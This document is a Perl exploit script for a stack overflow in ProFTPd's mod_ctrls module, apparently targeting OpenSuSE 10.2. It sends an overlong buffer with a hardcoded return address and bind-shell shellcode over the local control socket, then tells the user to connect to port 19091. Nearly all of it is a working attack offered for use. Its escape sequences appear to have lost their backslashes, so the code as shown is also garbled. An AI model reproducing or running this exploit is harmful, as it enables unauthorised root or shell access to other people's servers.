#!/usr/bin/perl -w
#
# Exploit for the ProFTPd mod_ctrls vulnerability.
# Stack Overflow in function
# int pr_ctrls_recv_request(pr_crls_cl_t *cl)
# unchecked buffer for arguments of the module
#
# connects to the unix domain socket and sends a string
# that is longer than the buffer (char[512]).
#
# Cheers to Alfredo "revenge" Pesoli for the implementation 
# on Ubuntu and Debian Etch
#
# works on OpenSuSE 10.2 on i686
# 
# http://www.devtarget.org
# Michael Domberg
#
# Usage: $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /path/to/local/socket
#
# Example (on OpenSuSE 10.2):
# $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /usr/local/var/proftpd/proftpd.sock
#
###############################
use strict;
use Socket;

# bind on port 19091
my $shell = 
"x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80".
"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80".
"x89xc7x31xc9x66xb9x4ax93x52x66x51x43x66x53x89xe1".
"xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd".
"x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3".
"x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88".
"x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d".
"x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68";

print "[+] Preparing attack string...n";

my $rsock   = shift;

my $buf = "A"x520; 

use constant TEMPSOCK  => '/tmp/tmp.sock';

$buf = $buf."x0axff"."AAAAaaaaAAAAaaaa"."x77xe7xffxff".$shell;
my $l = length($buf);
print "[+] Opening Unix Domain Socket to mod_ctrls n";

socket (SOCK, PF_UNIX, SOCK_STREAM, 0)  or die "[-] Socket creation failed : $!";
my $rfile = sockaddr_un($rsock);

unlink TEMPSOCK;
my $lfile = sockaddr_un(TEMPSOCK);

bind (SOCK, $lfile) or die "[-] Creation of Unix Domain Socket failed. ($lfile)";
chmod (00700, TEMPSOCK);

connect (SOCK, $rfile) or die "n [-] Connection to control socket failed.nn";

print "[+] Sending attack...n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buf,0;

close SOCK;

print "n [+] Attack String sent. Try to connect to Port 19091nn";